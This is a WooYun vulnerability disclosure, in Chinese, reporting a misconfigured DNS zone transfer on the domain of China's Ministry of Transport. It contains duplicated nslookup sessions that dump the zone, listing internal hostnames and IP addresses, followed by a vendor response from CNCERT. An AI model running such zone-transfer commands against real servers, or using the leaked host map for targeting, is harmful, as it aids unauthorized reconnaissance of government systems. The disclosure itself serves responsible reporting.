当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043518

漏洞标题:中华人民共和国交通运输部DNS域传送

相关厂商:www.moc.gov.cn

漏洞作者: OverFlow

提交时间:2013-11-20 20:19

修复时间:2014-01-04 20:20

公开时间:2014-01-04 20:20

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-20: 细节已通知厂商并且等待厂商处理中
2013-11-24: 厂商已经确认,细节仅向厂商公开
2013-12-04: 细节向核心白帽子及相关领域专家公开
2013-12-14: 细节向普通白帽子公开
2013-12-24: 细节向实习白帽子公开
2014-01-04: 细节向公众公开

简要描述:

DNS域传送,不多说了吧。

详细说明:

服务器安全配置不当,导致区域传送。

C:\Documents and Settings\Administrator>nslookup
Default Server: google-public-dns-a.google.com
Address: 8.8.8.8
> set type=ns
> moc.gov.cn
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
moc.gov.cn nameserver = ns.moc.gov.cn
moc.gov.cn nameserver = mocbk.moc.gov.cn
> server mocbk.moc.gov.cn
Default Server: mocbk.moc.gov.cn
Address: 219.143.235.1
> ls -d moc.gov.cn > moc.gov.cn.txt
[mocbk.moc.gov.cn]
#
Received 76 records.
> view moc.gov.cn.txt
2006 A 202.96.42.24
anbao A 202.96.42.39
atestsc A 218.244.254.56
ba A 202.96.42.70
bslw A 202.96.42.95
chaozai A 202.96.42.39
cice A 202.96.42.69
ctt A 202.96.42.44
dlyscz A 219.143.235.79
dlysfw A 219.143.235.82
dlysxcsg A 219.143.235.80
dns A 219.143.235.2
dund A 219.143.235.59
dwckk A 202.96.42.79
email A 219.143.235.36
fa A 219.143.235.58
fbxt A 219.143.235.78
ftp A 202.96.42.9
gjds A 219.143.235.81
gkpc A 218.247.138.184
glc A 219.143.235.53
glcx A 219.143.235.31
glsg A 219.143.235.51
glxy A 219.143.235.76

漏洞证明:

C:\Documents and Settings\Administrator>nslookup
Default Server: google-public-dns-a.google.com
Address: 8.8.8.8
> set type=ns
> moc.gov.cn
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
moc.gov.cn nameserver = ns.moc.gov.cn
moc.gov.cn nameserver = mocbk.moc.gov.cn
> server mocbk.moc.gov.cn
Default Server: mocbk.moc.gov.cn
Address: 219.143.235.1
> ls -d moc.gov.cn > moc.gov.cn.txt
[mocbk.moc.gov.cn]
#
Received 76 records.
> view moc.gov.cn.txt
2006 A 202.96.42.24
anbao A 202.96.42.39
atestsc A 218.244.254.56
ba A 202.96.42.70
bslw A 202.96.42.95
chaozai A 202.96.42.39
cice A 202.96.42.69
ctt A 202.96.42.44
dlyscz A 219.143.235.79
dlysfw A 219.143.235.82
dlysxcsg A 219.143.235.80
dns A 219.143.235.2
dund A 219.143.235.59
dwckk A 202.96.42.79
email A 219.143.235.36
fa A 219.143.235.58
fbxt A 219.143.235.78
ftp A 202.96.42.9
gjds A 219.143.235.81
gkpc A 218.247.138.184
glc A 219.143.235.53
glcx A 219.143.235.31
glsg A 219.143.235.51
glxy A 219.143.235.76

修复方案:

完善服务器安全配置,你们比我懂。

版权声明:转载请注明来源 OverFlow@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-11-24 21:55

厂商回复:

对于部委DNS域传送相关案例,CNCERT已经在今年对部委网站的专项测试任务中完成。涉及所述案例已经上报国家某信息安全协调机构。

最新状态:

暂无